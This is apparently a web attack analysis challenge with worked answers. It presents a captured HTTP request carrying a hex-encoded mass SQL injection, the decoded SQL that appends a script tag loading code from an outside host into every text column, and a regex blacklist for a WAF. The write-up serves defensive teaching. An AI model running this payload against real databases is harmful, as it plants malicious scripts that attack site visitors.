Web Attack Analysis Challenge #1

Analysis Challenge #1

Review this HTTP request -

GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522053454c45435420612e6e616d652c622e6e616d652046524f4d207379736f626a6563747320612c737973636f6c756d6e73206220574845524520612e69643d622e696420414e4420612e78747970653d27752720414e442028622e78747970653d3939204f5220622e78747970653d3335204f5220622e78747970653d323331204f5220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d525452494d28434f4e5645525428564152434841522834303030292c5b272b40432b275d29292b27273c736372697074207372633d73646f2e313030306d672e636e2f63737273732f772e6a733e3c2f7363726970743e27272729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f7220%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Accept-Language: en-US
Accept-Encoding: deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: www.example.com
Connection: Close

Questions:  Please provide as much detail as possible for steps used to answer these questions.
What type of attack is this?
Can you decode the attack payload?
What is the end goal of the attack?
How could a WAF detect and block this attack?

blacklist.txt

# case-insensitive regex list of patterns to block
# target: GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE @S VARCHAR(4000);SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S);-- HTTP/1.1

# matches: varchar(, varchar (, varchar               (
varchar\s*\(

# matches: cast(, cast (, cast               (
cast\s*\(

# matches: exec(, exec (, exec               (
exec\s*\(

payload.sql

DECLARE @T VARCHAR(255), @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name,b.name FROM sysobjects a,syscolumns b
  WHERE a.id=b.id
    AND a.xtype='u'
    AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)

OPEN Table_Cursor
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0) BEGIN
    EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=sdo.1000mg.cn/csrss/w.js></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
CLOSE Table_Cursor

DEALLOCATE Table_Cursor;

Q. What type of attack is this?
A. This is a SQLi attack with a hex encoded payload for obfuscation

Q. Can you decode the attack payload?
A. Yes: https://gist.github.com/rdev5/8b268b57305801e609fd#file-payload-sql

Q. What is the end goal of the attack?
A. Wholesale insert a <script ...></script> tag into any table column it has UPDATE privileges to in an attempt to include this script on a web page, prefixed with the column name (form of blind SQLi testing) for possibly further exploitation:

column_name<script src=sdo.1000mg.cn/csrss/w.js></script>

Q. How could a WAF detect and block this attack?
A. Blacklist one or more SQL command patterns: https://gist.github.com/rdev5/8b268b57305801e609fd#file-blacklist-txt